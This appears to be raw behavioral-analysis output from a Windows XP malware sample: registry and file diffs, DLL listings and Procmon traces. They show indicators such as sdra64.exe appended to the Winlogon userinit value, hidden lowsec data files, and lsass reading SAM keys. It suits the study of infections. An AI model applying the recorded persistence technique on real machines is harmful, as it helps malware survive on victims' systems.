HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cookies"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\LocalService\Cookies
New data: C:\WINDOWS\system32\config\systemprofile\Cookies
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "History"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\NetworkService\Local Settings\History
New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\History
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
"SavedLegacySettings"
Old type: REG_BINARY
New type: REG_BINARY
Old data: 46, 00, 00, 00, 0C, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 04, 00, 00,
00, 00, 00, 00, 00, 60, CA, 45, 95, FD, E8, CB, 01, 03, 00, 00, 00, A9, FE, FB, AA, A9, FE, 73, 47, 0A, 00, 01, 10, 00, 00, 00, 00,
00, 00, 00, 00, 00, 00, 00, 00
New data: 46, 00, 00, 00, 0D, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 04, 00, 00,
00, 00, 00, 00, 00, 60, CA, 45, 95, FD, E8, CB, 01, 03, 00, 00, 00, A9, FE, FB, AA, A9, FE, 73, 47, 0A, 00, 01, 10, 00, 00, 00, 00,
00, 00, 00, 00, 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG "Seed"
Old type: REG_BINARY
New type: REG_BINARY
Old data: CC, 90, 4A, 9F, 9B, DA, 48, D5, 27, 35, 0E, FD, 53, F6, 0D, FC, 6A, 3B, E4, 76, C7, E1, 6F, D6, 29,
85, D8, 01, 2F, A0, 8C, E0, 8B, 12, 95, 13, 68, 82, FC, C4, 41, DE, D9, 90, 41, AE, C3, B2, 52, 11, 99, FC, CB, 5B, 1D, E3, 1D,
E2, 17, A3, 1A, 34, 28, 42, ED, 02, 5A, 4C, 58, E1, 7C, DC, 30, 09, B1, 2C, 08, A2, 96, A2
New data: 7E, 4F, 14, E1, 46, 40, C9, 10, D8, 57, EE, 23, 5E, 8A, E2, B1, 7F, 24, 5A, 12, C4, F5, BE, 01, 37,
8C, 92, 94, 05, 7E, CF, AE, A9, 9F, BF, F4, F7, CA, DB, 6A, 91, 16, C2, 92, 54, 8E, 4D, DB, 83, 86, 93, A1, FE, 71, 93, 2F, E6,
75, D4, FE, C0, 38, FB, 3A, EE, 0B, 7B, 53, D2, BE, C9, E9, 26, 5A, 07, 1B, C8, AD, 73, 55
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Epoch "Epoch"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 6E, 01, 00, 00
New data: 70, 01, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{C13D5410-597B-4B3B-
A011-8BBF40B640BF} "DhcpRetryStatus"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 01, 00, 00, 00
New data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{DFD98CD7-D998-4BDE-
9EFE-D137415271B6} "DhcpRetryStatus"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 01, 00, 00, 00
New data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{DFD98CD7-D998-4BDE-
9EFE-D137415271B6} "DhcpRetryTime"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 25, 01, 00, 00
New data: 49, 01, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch "Epoch"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 6E, 01, 00, 00
New data: 70, 01, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C13D5410-597B-
4B3B-A011-8BBF40B640BF} "DhcpRetryStatus"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 01, 00, 00, 00
New data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{DFD98CD7-D998-
4BDE-9EFE-D137415271B6} "DhcpRetryStatus"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 01, 00, 00, 00
New data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{DFD98CD7-D998-
4BDE-9EFE-D137415271B6} "DhcpRetryTime"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 25, 01, 00, 00
New data: 49, 01, 00, 00
------------------------------------------------------------
Disk contents
*************
Drives tracked: 1
-----------------
* c:\
Folders deleted: 1
------------------
c:\WINDOWS\system32\lowsec
Files deleted: 2
----------------
c:\WINDOWS\system32\lowsec\user.ds
Date: 4/24/2011 7:41 PM
Size: 2,423 bytes
c:\WINDOWS\system32\lowsec\user.ds.lll
Date: 3/23/2011 11:46 PM
Size: 1,377 bytes
Files changed: 21
-----------------
c:\Documents and Settings\Kevin\NTUSER.DAT.LOG
Old date: 4/24/2011 8:01 PM
New date: 4/24/2011 8:02 PM
Old size: 1,024 bytes
New size: 1,024 bytes
c:\Documents and Settings\Kevin\Cookies\index.dat
Old date: 4/24/2011 7:58 PM
New date: 4/24/2011 8:01 PM
Old size: 32,768 bytes
New size: 32,768 bytes
c:\Documents and Settings\Kevin\Local Settings\History\History.IE5\index.dat
Old date: 4/24/2011 7:58 PM
New date: 4/24/2011 8:01 PM
Old size: 49,152 bytes
New size: 49,152 bytes
c:\Documents and Settings\Kevin\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Old date: 4/24/2011 7:58 PM
New date: 4/24/2011 8:01 PM
Old size: 425,984 bytes
New size: 425,984 bytes
c:\Documents and Settings\LocalService\ntuser.dat.LOG
Old date: 4/24/2011 7:44 PM
New date: 4/24/2011 8:02 PM
Old size: 1,024 bytes
New size: 1,024 bytes
c:\Documents and Settings\LocalService\Local Settings\Temp\Cookies\index.dat
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 16,384 bytes
New size: 16,384 bytes
c:\Documents and Settings\LocalService\Local Settings\Temp\History\History.IE5\index.dat
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 16,384 bytes
New size: 16,384 bytes
c:\Documents and Settings\LocalService\Local Settings\Temp\Temporary Internet Files\Content.IE5\index.dat
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes
c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Old date: 4/24/2011 7:44 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes
c:\Documents and Settings\NetworkService\ntuser.dat.LOG
Old date: 4/24/2011 7:44 PM
New date: 4/24/2011 8:02 PM
Old size: 1,024 bytes
New size: 1,024 bytes
c:\Documents and Settings\NetworkService\Local Settings\Temp\Cookies\index.dat
Old date: 4/24/2011 3:29 PM
New date: 4/24/2011 8:02 PM
Old size: 16,384 bytes
New size: 16,384 bytes
c:\Documents and Settings\NetworkService\Local Settings\Temp\History\History.IE5\index.dat
Old date: 4/24/2011 3:29 PM
New date: 4/24/2011 8:02 PM
Old size: 16,384 bytes
New size: 16,384 bytes
c:\Documents and Settings\NetworkService\Local Settings\Temp\Temporary Internet Files\Content.IE5\index.dat
Old date: 4/24/2011 3:29 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes
c:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Old date: 4/24/2011 7:42 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes
c:\WINDOWS\Prefetch\BT.EXE-28F64617.pf
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 14,114 bytes
New size: 14,232 bytes
c:\WINDOWS\system32\config\default.LOG
Old date: 4/24/2011 7:55 PM
New date: 4/24/2011 8:02 PM
Old size: 1,024 bytes
New size: 1,024 bytes
c:\WINDOWS\system32\config\software.LOG
Old date: 4/24/2011 8:01 PM
New date: 4/24/2011 8:02 PM
Old size: 1,024 bytes
New size: 1,024 bytes
c:\WINDOWS\system32\config\system.LOG
Old date: 4/24/2011 8:01 PM
New date: 4/24/2011 8:02 PM
Old size: 1,024 bytes
New size: 1,024 bytes
c:\WINDOWS\system32\config\systemprofile\Cookies\index.dat
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes
c:\WINDOWS\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes
c:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes
------------------------------------------------------------
INI file
********
Ini files tracked: 4
--------------------
* C:\boot.ini
* c:\windows\control.ini
* c:\windows\system.ini
* c:\windows\win.ini
------------------------------------------------------------
Text file
*********
Text files tracked: 2
---------------------
* c:\windows\system32\autoexec.nt
* c:\windows\system32\config.nt
------------------------------------------------------------
InCtrl5, Copyright © 2000 by Ziff Davis Media, Inc.
Written by Neil J. Rubenking
First published in PC Magazine, December 5, 2000.
WinMerge ListDLLs: showing only the entries that differ, taken from listdlls_after.txt
0x3d930000 0xd1000 7.00.6000.17095 wininet.dll
0x00aa0000 0x9000 6.00.5441.0000 Normaliz.dll
0x3dfd0000 0x45000 7.00.6000.17095 iertutil.dll
0x71ad0000 0x9000 5.01.2600.5512 wsock32.dll
0x7c9c0000 0x817000 6.00.2900.6072 shell32.dll
0x77f60000 0x76000 6.00.2900.5912 SHLWAPI.dll
0x5d090000 0x9a000 5.82.2900.6028 comctl32.dll
0x774e0000 0x13e000 5.01.2600.6010 ole32.dll
0x77a80000 0x95000 5.131.2600.5512 crypt32.dll
0x77b20000 0x12000 5.01.2600.5875 MSASN1.dll
0x68000000 0x36000 5.01.2600.5507 rsaenh.dll
0x76bf0000 0xb000 5.01.2600.5512 psapi.dll
0x662b0000 0x58000 5.01.2600.5512 hnetcfg.dll
0x76ee0000 0x3c000 5.01.2600.5512 RASAPI32.dll
0x76e90000 0x12000 5.01.2600.5512 rasman.dll
0x76eb0000 0x2f000 5.01.2600.5512 TAPI32.dll
0x76e80000 0xe000 5.01.2600.5512 rtutils.dll
0x77c70000 0x25000 5.01.2600.5876 msv1_0.dll
0x76790000 0xc000 5.01.2600.5512 cryptdll.dll
0x76d60000 0x19000 5.01.2600.5512 iphlpapi.dll
0x722b0000 0x5000 5.01.2600.5512 sensapi.dll
0x71a50000 0x3f000 5.01.2600.5625 mswsock.dll
0x76fc0000 0x6000 5.01.2600.5512 rasadhlp.dll
0x78130000 0x128000 7.00.6000.17095 urlmon.dll
0x76f20000 0x27000 5.01.2600.5625 DNSAPI.dll
0x71a90000 0x8000 5.01.2600.5512 wshtcpip.dll
0x5e0c0000 0xd000 5.01.2600.5512 pstorec.dll
0x76b20000 0x11000 3.05.2284.0002 ATL.DLL
0x5b860000 0x55000 5.01.2600.5694 netapi32.dll
0x75970000 0xf8000 5.01.2600.5512 MSGINA.dll
0x74320000 0x3d000 3.525.3012.0000 ODBC32.dll
0x763b0000 0x49000 6.00.2900.5512 comdlg32.dll
0x02c50000 0x17000 3.525.1132.0000 odbcint.dll
0x71ab0000 0x17000 5.01.2600.5512 ws2_32.dll
0x71aa0000 0x8000 5.01.2600.5512 WS2HELP.dll
0x7c9c0000 0x817000 6.00.2900.6072 shell32.dll
0x77f60000 0x76000 6.00.2900.5912 SHLWAPI.dll
0x773d0000 0x103000 5.82.2900.6028 comctl32.dll
0x77c00000 0x8000 5.01.2600.5512 VERSION.dll
0x769c0000 0xb4000 5.01.2600.5512 userenv.dll
0x68000000 0x36000 5.01.2600.5507 rsaenh.dll
WinMerge Procmon
Sample output of some of the interesting items discovered; the full output is very long.
8:04:53.2816426 PM","winlogon.exe","916","RegCreateKey","HKLM\software\microsoft\windows nt\currentversion\winlogon","SUCCESS","Desired Access: Query Value, Set Value
8:04:53.2817289 PM","winlogon.exe","916","RegQueryValue","HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit","SUCCESS","Type: REG_SZ, Length: 130, Data: C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe,
8:04:53.2817808 PM","winlogon.exe","916","RegCloseKey","HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","SUCCESS",""
"7:47:44.6292542 PM","lsass.exe","972","RegOpenKey","HKLM\SECURITY\Policy\SecDesc","SUCCESS","Desired Access: Read"
"8:04:53.3393918 PM","lsass.exe","972","RegOpenKey","HKLM\SECURITY\Policy","SUCCESS","Desired Access: Read/Write"
8:04:53.3394714 PM","lsass.exe","972","RegQueryValue","HKLM\SECURITY\Policy\SecDesc\(Default)","BUFFER OVERFLOW","Length: 12"
8:04:53.4492538 PM","lsass.exe","972","RegCloseKey","HKLM\SECURITY\Policy","SUCCESS",""
8:04:54.5563677 PM","Explorer.EXE","424","QueryDirectory","C:\Documents and Settings\Kevin\Desktop\ss","SUCCESS","0:
handle.exe, 1: hex2dec.exe, 2: junction.exe, 3: kjk_before.bat, 4: ldmdump.exe, 5: Listdlls.exe, 6: listdlls_before.txt, 7: livekd.exe,
8: LoadOrd.exe, 9: logonsessions.exe, 10: movefile.exe, 11: ntfsinfo.exe, 12: pagedfrg.exe, 13: pagedfrg.hlp, 14: pdh.dll, 15:
pendmoves.exe, 16: pipelist.exe, 17: PORTMON.CNT, 18: portmon.exe, 19: PORTMON.HLP, 20: procdump.exe, 21:
procexp.chm, 22: procexp.exe, 23: ProcFeatures.exe, 24: procmon.chm, 25: Procmon.exe, 26: PsExec.exe, 27: psfile.exe, 28:
PsGetsid.exe, 29: PsInfo.exe, 30: pskill.exe, 31: PsList.exe, 32: pslist_before.txt
verclsid.exe:
CreateFile C: SUCCESS Desired Access: Read Attributes, Write Attributes, Synchronize, Disposition: Open,
Options: Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a, OpenResult: Opened
QueryInformationVolume C: SUCCESS VolumeCreationTime: 3/22/2011 4:48:20 PM, VolumeSerialNumber: 907B-
F0DE, SupportsObjects: True, VolumeLabel:
RegCreateKey HKCU\Software\Microsoft\SystemCertificates\MY SUCCESS Desired Access: All Access
RegQueryValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Personal SUCCESS
Type: REG_EXPAND_SZ, Length: 54, Data: %USERPROFILE%\My Documents
RegQueryValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local Settings SUCCESS
Type: REG_EXPAND_SZ, Length: 58, Data: %USERPROFILE%\Local Settings
RegQueryKey HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Query: Full,
SubKeys: 0, Values: 13
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 0,
Name: ComSpec, Type: REG_EXPAND_SZ, Length: 60, Data: %SystemRoot%\system32\cmd.exe
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 1,
Name: Path, Type: REG_EXPAND_SZ, Length: 124, Data:
%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 2,
Name: windir, Type: REG_EXPAND_SZ, Length: 26, Data: %SystemRoot%
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 3,
Name: OS, Type: REG_SZ, Length: 22, Data: Windows_NT
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 4,
Name: PROCESSOR_ARCHITECTURE, Type: REG_SZ, Length: 8, Data: x86
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 5,
Name: PROCESSOR_LEVEL, Type: REG_SZ, Length: 4, Data: 6
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 6,
Name: PROCESSOR_IDENTIFIER, Type: REG_SZ, Length: 96, Data: x86 Family 6 Model 23 Stepping 10, GenuineIntel
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 7,
Name: PROCESSOR_REVISION, Type: REG_SZ, Length: 10, Data: 170a
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 8,
Name: NUMBER_OF_PROCESSORS, Type: REG_SZ, Length: 4, Data: 1
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 9,
Name: PATHEXT, Type: REG_SZ, Length: 98, Data: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 10,
Name: TEMP, Type: REG_EXPAND_SZ, Length: 36, Data: %SystemRoot%\TEMP
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 11,
Name: TMP, Type: REG_EXPAND_SZ, Length: 36, Data: %SystemRoot%\TEMP
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 12,
Name: FP_NO_HOST_CHECK, Type: REG_SZ, Length: 6, Data: NO
RegOpenKey HKCU\Volatile Environment SUCCESS Desired Access: Read
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 0, Name: LOGONSERVER, Type: REG_SZ,
Length: 26, Data: \\XPWUPDATES
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 1, Name: CLIENTNAME, Type: REG_SZ, Length:
16, Data: Console
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 2, Name: SESSIONNAME, Type: REG_SZ,
Length: 16, Data: Console
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 3, Name: APPDATA, Type: REG_SZ, Length: 98,
Data: C:\Documents and Settings\Kevin\Application Data
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 4, Name: HOMEDRIVE, Type: REG_SZ, Length:
6, Data: C:
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 5, Name: HOMESHARE, Type: REG_SZ, Length:
2, Data:
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 6, Name: HOMEPATH, Type: REG_SZ, Length:
60, Data: \Documents and Settings\Kevin
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 0, Name: LOGONSERVER, Type: REG_SZ,
Length: 26, Data: \\XPWUPDATES
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 1, Name: CLIENTNAME, Type: REG_SZ, Length:
16, Data: Console
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 2, Name: SESSIONNAME, Type: REG_SZ,
Length: 16, Data: Console
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 3, Name: APPDATA, Type: REG_SZ, Length: 98,
Data: C:\Documents and Settings\Kevin\Application Data
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 4, Name: HOMEDRIVE, Type: REG_SZ, Length:
6, Data: C:
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 5, Name: HOMESHARE, Type: REG_SZ, Length:
2, Data:
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 6, Name: HOMEPATH, Type: REG_SZ, Length:
60, Data: \Documents and Settings\Kevin
QueryNameInformationFile C:\WINDOWS\system32\verclsid.exe SUCCESS Name:
\WINDOWS\system32\verclsid.exe
Load Image C:\WINDOWS\system32\verclsid.exe SUCCESS Image Base: 0x1000000, Image Size: 0xb000
Load Image C:\WINDOWS\system32\ntdll.dll SUCCESS Image Base: 0x7c900000, Image Size: 0xb2000
QueryNameInformationFile C:\WINDOWS\system32\verclsid.exe SUCCESS Name:
\WINDOWS\system32\verclsid.exe
CreateFile C:\WINDOWS\Prefetch\VERCLSID.EXE-3667BD89.pf SHARING VIOLATION Desired Access:
Generic Read, Disposition: Open, Options: Synchronous IO Non-Alert, Attributes: n/a, ShareMode: None, AllocationSize: n/a
RegOpenKey HKLM\Software\Clients\Mail SUCCESS Desired Access: Query Value
RegQueryValue HKLM\SOFTWARE\Clients\Mail\(Default) SUCCESS Type: REG_SZ, Length: 32, Data: Outlook
Express
lsass.exe RegQueryValue
HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName SUCCESS Type:
REG_SZ, Length: 22,
Data: XPWUPDATES
HKLM\SAM\SAM\C SUCCESS Type: REG_BINARY, Length: 168,
Data: 07 00 01 00 00 00 00 00 98 00 00 00 02 00 01 00
HKLM\SAM\SAM\Domains\Account\V SUCCESS Type: REG_BINARY, Length: 296,
Data: 00 00 00 00 E0 00 00 00 02 00 01 00 E0 00 00 00
HKLM\SAM\SAM\Domains\Builtin\V SUCCESS Type: REG_BINARY, Length: 212,
Data: 00 00 00 00 98 00 00 00 02 00 01 00 98 00 00 00
HKLM\SAM\SAM\Domains\Account\Users\Names\Kevin\(Default) SUCCESS Type: <Unknown: 1003>, Length: 0
HKLM\SAM\SAM\Domains\Account\Users\000003EB\V SUCCESS Type: REG_BINARY, Length: 444,
Data: 00 00 00 00 BC 00 00 00 02 00 01 00 BC 00 00 00
RegQueryValue HKLM\SAM\SAM\Domains\Account\Users\000003EB\F SUCCESS Type: REG_BINARY, Length:
80,
Data: 02 00 01 00 00 00 00 00 B0 06 A1 4F D9 02 CC 01
HKLM\SECURITY\Policy\SecDesc\(Default) SUCCESS Type: REG_NONE, Length: 180,
Data: 01 00 04 80 98 00 00 00 A8 00 00 00 00 00 00 00
HKLM\SAM\SAM\Domains\Account\Users\Names\SUPPORT_388945a0\(Default) SUCCESS Type: <Unknown: 1002>,Length:
0
HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C SUCCESS Type: REG_BINARY, Length: 440,
Data: 20 02 00 00 00 00 00 00 98 00 00 00 02 00 01 00
HKLM\SAM\SAM\Domains\Account\Users\Names\HelpAssistant\(Default) SUCCESS Type: <Unknown: 1000>, Length: 0
HKLM\SAM\SAM\Domains\Account\Users\Names\Guest\(Default) SUCCESS Type: <Unknown: 501>, Length: 0
HKLM\SAM\SAM\Domains\Account\Users\Names\Administrator\(Default) SUCCESS Type: <Unknown: 500>, Length: 0
Explorer.exe
Process Create C:\WINDOWS\system32\verclsid.exe SUCCESS PID: 2376, Command line: /S /C {2559A1F4-
21D7-11D4-BDAF-00C04F60B9F0} /I {000214E6-0000-0000-C000-000000000046} /X 0x401
Process Create C:\WINDOWS\system32\verclsid.exe SUCCESS PID: 2444, Command line: /S /C {2559A1F5-
21D7-11D4-BDAF-00C04F60B9F0} /I {000214E6-0000-0000-C000-000000000046} /X 0x401
RegCreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders SUCCESS
Desired Access: Maximum Allowed
RegEnumKey HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace SUCCESS
Index: 0, Name: {1f4de370-d627-11d1-ba4f-00a0c91eedba}
RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C13D5410-597B-4B3B-A011-
8BBF40B640BF}\EnableDHCP SUCCESS Type: REG_DWORD, Length: 4, Data: 1
RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C13D5410-597B-4B3B-A011-
8BBF40B640BF}\LeaseObtainedTime SUCCESS Type: REG_DWORD, Length: 4, Data: 1303688626
RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C13D5410-597B-4B3B-A011-
8BBF40B640BF}\DhcpServer SUCCESS Type: REG_SZ, Length: 32, Data: 255.255.255.255
RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{1DFB3CAE-1ACD-4CE9-A8F6-
0548AB912EF5}\LeaseObtainedTime SUCCESS Type: REG_DWORD, Length: 4, Data: 1303688565
RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{1DFB3CAE-1ACD-4CE9-A8F6-
0548AB912EF5}\LeaseTerminatesTime SUCCESS Type: REG_DWORD, Length: 4, Data: 1303774965
RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{1DFB3CAE-1ACD-4CE9-A8F6-
0548AB912EF5}\DhcpServer SUCCESS Type: REG_SZ, Length: 24, Data: 192.168.1.1
svchost.exe
CreateFile C:\WINDOWS\system32\wbem\Logs\wbemcore.log SUCCESS Desired Access: Generic Write, Read
Attributes, Disposition: OpenIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: NNCI, ShareMode: Read,
Delete, AllocationSize: 0, OpenResult: Opened
CreateFile C:\WINDOWS\system32\wbem\wmiprvse.exe SUCCESS Desired Access: Read Data/List
Directory, Execute/Traverse, Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-
Directory File, Attributes: n/a, ShareMode: Read, Delete, AllocationSize: n/a, Impersonating: NT AUTHORITY\SYSTEM,
OpenResult: Opened
CreateFile C:\WINDOWS\AppPatch\sysmain.sdb SUCCESS Desired Access: Generic Read, Disposition:
Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: N, ShareMode: Read, AllocationSize: n/a,
Impersonating: NT AUTHORITY\SYSTEM, OpenResult: Opened
CreateFile C:\WINDOWS\system32\wbem SUCCESS Desired Access: Read EA, Read Attributes, Read Control,
Disposition: Open, Options: , Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a, Impersonating: NT
AUTHORITY\SYSTEM, OpenResult: Opened
CreateFile C:\WINDOWS\WinSxS SUCCESS Desired Access: Read EA, Read Attributes, Read Control,
Disposition: Open, Options: , Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a, Impersonating: NT
AUTHORITY\SYSTEM, OpenResult: Opened
CreateFile C:\WINDOWS\WinSxS\X86_MICROSOFT.WINDOWS.COMMON-
CONTROLS_6595B64144CCF1DF_6.0.2600.6028_X-WW_61E65202 SUCCESS Desired Access: Read EA,
Read Attributes, Read Control, Disposition: Open, Options: , Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a,
Impersonating: NT AUTHORITY\SYSTEM, OpenResult: Opened
CreateFile C:\WINDOWS\Prefetch\WMIPRVSE.EXE-28F301A9.pf SUCCESS Desired Access: Generic
Read/Write, Disposition: OverwriteIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode:
None, AllocationSize: 0, Impersonating: NT AUTHORITY\SYSTEM, OpenResult: Overwritten
CreateFile C:\WINDOWS\Prefetch SUCCESS Desired Access: Synchronize, Disposition: Open, Options:
Directory, Synchronous IO Non-Alert, Open For Backup, Attributes: N, ShareMode: Read, Write, AllocationSize: n/a,
Impersonating: NT AUTHORITY\SYSTEM, OpenResult: Opened
CreateFile C:\WINDOWS\system32\lowsec\user.ds.lll SUCCESS Desired Access: Generic Read/Write,
Disposition: OpenIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: H, ShareMode: Read, AllocationSize: 0,
OpenResult: Opened
CreateFile C:\WINDOWS\system32\lowsec\local.ds SUCCESS Desired Access: Generic Read, Disposition:
Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: Read, AllocationSize: n/a,
OpenResult: Opened
CreateFile C:\WINDOWS\system32\config\systemprofile\Cookies\system@kerkvlietkj[1].txt SUCCESS
Desired Access: Generic Write, Read Attributes, Disposition: Create, Options: Synchronous IO Non-Alert, Non-
Directory File, Attributes: NCI, ShareMode: Read, Write, Delete, AllocationSize: 0, OpenResult: Created
CreateFile C:\WINDOWS\WINDOWSSHELL.MANIFEST SUCCESS Desired Access: Read EA, Read
Attributes, Read Control, Disposition: Open, Options: , Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a,
Impersonating: NT AUTHORITY\SYSTEM, OpenResult: Opened
FlushBuffersFile C:\WINDOWS\system32\lowsec\user.ds.lll SUCCESS
Process Create C:\WINDOWS\system32\wbem\wmiprvse.exe SUCCESS PID: 3540, Command line:
C:\WINDOWS\system32\wbem\wmiprvse.exe -Embedding
QueryOpen C:\WINDOWS\win.ini SUCCESS CreationTime: 8/23/2001 8:00:00 AM, LastAccessTime: 4/24/2011
8:03:01 PM, LastWriteTime: 3/23/2011 1:23:23 AM, ChangeTime: 3/23/2011 1:23:23 AM, AllocationSize: 520, EndOfFile: 519,
FileAttributes: A
QueryOpen C:\WINDOWS\WINDOWSSHELL.MANIFEST SUCCESS CreationTime: 3/22/2011 9:56:13 PM,
LastAccessTime: 4/24/2011 8:04:59 PM, LastWriteTime: 3/22/2011 9:56:13 PM, ChangeTime: 3/22/2011 9:56:13 PM,
AllocationSize: 4,096, EndOfFile: 749, FileAttributes: RHA
QueryOpen C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-
ww_61e65202\comctl32.dll SUCCESS CreationTime: 3/23/2011 9:15:46 PM, LastAccessTime: 4/24/2011 8:04:59
